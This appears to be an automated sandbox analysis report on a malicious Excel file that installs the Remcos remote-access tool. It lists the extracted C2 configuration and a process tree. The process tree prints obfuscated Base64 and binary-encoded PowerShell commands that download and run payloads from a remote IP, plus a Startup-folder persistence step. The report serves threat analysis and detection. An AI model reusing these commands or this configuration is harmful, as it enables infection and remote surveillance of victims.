Analysis

  • max time kernel
    149s
  • max time network
    133s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    18-08-2022 06:58

General

  • Target

    Payment Remittance.xls

  • Size

    79KB

  • MD5

    e12d4ea1d922a7bf268e0133163a92f6

  • SHA1

    b02e8013f9695756d9fab1a5b677bbb39b3e48d7

  • SHA256

    0ef76ce10558c86b6d359cd9da83a8fe3ba2dc2f36267447f4e191aaa4aa3125

  • SHA512

    c9eb96bf6445fd3f3336bf2649caf6e511ae831e95e580e7b8663288e623fa89660afa5f04334d6877b91e3924b8cf567f55514310224698c89e49e090e965a7

Score
10/10

Malware Config

Extracted

Family

remcos

Botnet

AUGB22

C2

saptransmissions.dvrlists.com:55026

Attributes
  • audio_folder

    MicRecords

  • audio_path

    %AppData%

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • install_path

    %AppData%

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    AUGB22

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    AUGB22-35AN4B

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    Remcos

  • take_screenshot_option

    false

  • take_screenshot_time

    5

  • take_screenshot_title

    wikipedia;solitaire;

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 63 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Payment Remittance.xls"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1936
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\Urhjg.bat" "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1968
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -WindowStyle hidden IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICdTaWxlbnRseUNvbnRpbnVlJzskdTBoajQ0dHQgPSAnW0VudW1dOjpUb09iamVjdChbU3lzdGVtLk4nICsnZXQuU2VjdXJpJyArJ3R5UHJvdG8nICsnY29sVHlwZV0sIDMwNzIpJ3xJRVg7W1N5c3RlbS5OZXQuU2VydmljZVBvaW50TWFuYWdlcl06OlNlY3VyaXR5UHJvdG9jb2wgPSAkdTBoajQ0dDskd2UyMj0nZVcudGVOIHRjJyArICdlamJPLXdlTignOyAkYjRkZj0nb2xud29ELil0bmVpJyArICdsQ2InOyAkYzM9JyknJ3Nidi50aW1lUlwnJytwbWV0OnZuZSQsJydzYnYudG51b2NzaUQvc2VsYVMvMTAxLjA0Mi4wMTIuMjkxLy86cHR0aCcnKGVsaUZkYSc7JFRDPSRjMywkYjRkZiwkd2UyMiAtSm9pbiAnJztJRVgoKFtyZWdleF06Ok1hdGNoZXMoJFRDLCcuJywnUmlnaHRUb0xlZnQnKSB8IEZvckVhY2ggeyRfLnZhbHVlfSkgLWpvaW4gJycpO3N0YXJ0LXByb2Nlc3MoJGVudjp0ZW1wKyAnXFJlbWl0LnZicycpO3JlbW92ZS1pdGVtICgkZW52OlVTRVJQUk9GSUxFICsgJ1xVcmhqZy5iYXQnKQ==')))
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1128
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Remit.vbs"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1988
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110010,00110001,00110000,00101110,00110010,00110100,00110000,00101110,00110001,00110000,00110001,00101111,01000001,01100111,01101001,01101110,01100111,00101111,01010011,01110100,01100001,01110100,01100101,01101101,01100101,01101110,01110100,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };$o00='ZE000'.replace('Z','I').replace('000','x');sal P $o00;([system.String]::Join('', $gf))|P
            5⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1332
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              6⤵
                PID:1984
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                6⤵
                • Suspicious use of SetWindowsHookEx
                PID:1252
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\Admin\AppData\Local\Temp\Remit.vbs' -Destination 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Remit.vbs'
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2004
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1820
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1820 CREDAT:275457 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1320

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    System Information Discovery

    2
    T1082

    Query Registry

    1
    T1012

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\lwrmjt1\imagestore.dat
      Filesize

      34KB

      MD5

      8fd829454e422e22f6092303e3afe956

      SHA1

      68f1c79258eea5e87b84b7700929fe214e13a3b3

      SHA256

      54c6c2d87694e9b598552b6537698f3ada676f447372874ea5975c120f99c33e

      SHA512

      cd0016e00d9042f01eaa6afe7e7e831cb463765402bf4a65b56a510fb4db4a3c1bce1fded10168db4f2927746e24559143738c593f8353a94e13634342d9c11f

    • C:\Users\Admin\AppData\Local\Temp\Remit.vbs
      Filesize

      2KB

      MD5

      dda8f5c12fe09dd7c4261d41615bf697

      SHA1

      c96a3872d665050edd90fec45bcf18086463a0be

      SHA256

      055d31c21414c88c3ffd5794ae798b5a5dcd1345cf42dda8c73b09ca79b0ee11

      SHA512

      8a2e26fd99813fb07180710bfbf721b3fa6a5a4e06cf06d5b186b9b4c3e9aff795543d68cf83d06bf362a7bc6c549583a61156b11df7f41fd5ebbb882fd310eb

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      Filesize

      7KB

      MD5

      11494764c7a2f1c58816af5fb177b639

      SHA1

      cef66ebfabc9ae5ff1d1dbeb49f6b1dfcd3d62f8

      SHA256

      5301a86742bd61d2fcf15e7d7897dfae4df475e48427112947420274c169b02e

      SHA512

      6b1938f3c001e915a37167c144e72bceb34e6aa9bb8a04f278d2fe7bec4bde213f451a5649db882aacab7cf1e20fbb659ecdacbf1d052a0b0ceae412d2999e3a

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
      Filesize

      7KB

      MD5

      11494764c7a2f1c58816af5fb177b639

      SHA1

      cef66ebfabc9ae5ff1d1dbeb49f6b1dfcd3d62f8

      SHA256

      5301a86742bd61d2fcf15e7d7897dfae4df475e48427112947420274c169b02e

      SHA512

      6b1938f3c001e915a37167c144e72bceb34e6aa9bb8a04f278d2fe7bec4bde213f451a5649db882aacab7cf1e20fbb659ecdacbf1d052a0b0ceae412d2999e3a

    • C:\Users\Admin\Urhjg.bat
      Filesize

      839B

      MD5

      46b56c8fca816fea66b2dcea221e1ee1

      SHA1

      8f92a4a1fb35ec3ae9e96422db9e82285e34c80c

      SHA256

      da185578464c981924d79ec49c6be913a859c300b181671de7edb6b338d37229

      SHA512

      d945e020c5f4a30fa2e3b4f8dba0917c999627c37d87d21e1bae299382b42a59d01ddc5427c3249186bdc53daf40d84ef4d67578901d50a2d9019b1181afed76

    • \Users\Admin\AppData\Local\Temp\b53c2cc7-7182-4828-85fb-f7ab53ddef24\AgileDotNetRT.dll
      Filesize

      94KB

      MD5

      14ff402962ad21b78ae0b4c43cd1f194

      SHA1

      f8a510eb26666e875a5bdd1cadad40602763ad72

      SHA256

      fb9646cb956945bdc503e69645f6b5316d3826b780d3c36738d6b944e884d15b

      SHA512

      daa7a08bf3709119a944bce28f6ebdd24e54a22b18cd9f86a87873e958df121a3881dcdd5e162f6b4e543238c7aef20f657c9830df01d4c79290f7c9a4fcc54b

    • memory/1128-160-0x000000006C3D0000-0x000000006C97B000-memory.dmp
      Filesize

      5.7MB

    • memory/1128-156-0x000000006C3D0000-0x000000006C97B000-memory.dmp
      Filesize

      5.7MB

    • memory/1128-153-0x0000000000000000-mapping.dmp
    • memory/1252-189-0x0000000000431CA9-mapping.dmp
    • memory/1252-196-0x0000000000400000-0x000000000047E000-memory.dmp
      Filesize

      504KB

    • memory/1252-197-0x0000000000400000-0x000000000047E000-memory.dmp
      Filesize

      504KB

    • memory/1332-172-0x0000000069900000-0x0000000069EAB000-memory.dmp
      Filesize

      5.7MB

    • memory/1332-194-0x0000000069900000-0x0000000069EAB000-memory.dmp
      Filesize

      5.7MB

    • memory/1332-195-0x0000000002668000-0x0000000002679000-memory.dmp
      Filesize

      68KB

    • memory/1332-163-0x0000000000000000-mapping.dmp
    • memory/1936-88-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-104-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-80-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-79-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-78-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-89-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-54-0x000000002F711000-0x000000002F714000-memory.dmp
      Filesize

      12KB

    • memory/1936-77-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-76-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-75-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-74-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-73-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-72-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-71-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-70-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-69-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-64-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-63-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-90-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-91-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-93-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-92-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-62-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-61-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-94-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-95-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-97-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-96-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-98-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-99-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-101-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-100-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-102-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-103-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-105-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-81-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-106-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-107-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-108-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-110-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-109-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-111-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-112-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-114-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-113-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-118-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-117-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-116-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-115-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-55-0x0000000071CA1000-0x0000000071CA3000-memory.dmp
      Filesize

      8KB

    • memory/1936-82-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-83-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-155-0x0000000000328000-0x000000000032A000-memory.dmp
      Filesize

      8KB

    • memory/1936-84-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1936-85-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-86-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-161-0x0000000072C8D000-0x0000000072C98000-memory.dmp
      Filesize

      44KB

    • memory/1936-162-0x0000000000328000-0x000000000032A000-memory.dmp
      Filesize

      8KB

    • memory/1936-87-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-57-0x0000000076DC1000-0x0000000076DC3000-memory.dmp
      Filesize

      8KB

    • memory/1936-65-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-66-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-67-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-68-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-58-0x0000000072C8D000-0x0000000072C98000-memory.dmp
      Filesize

      44KB

    • memory/1936-60-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1936-59-0x0000000000328000-0x000000000032C000-memory.dmp
      Filesize

      16KB

    • memory/1968-151-0x0000000000000000-mapping.dmp
    • memory/1988-157-0x0000000000000000-mapping.dmp
    • memory/2004-173-0x0000000069900000-0x0000000069EAB000-memory.dmp
      Filesize

      5.7MB

    • memory/2004-164-0x0000000000000000-mapping.dmp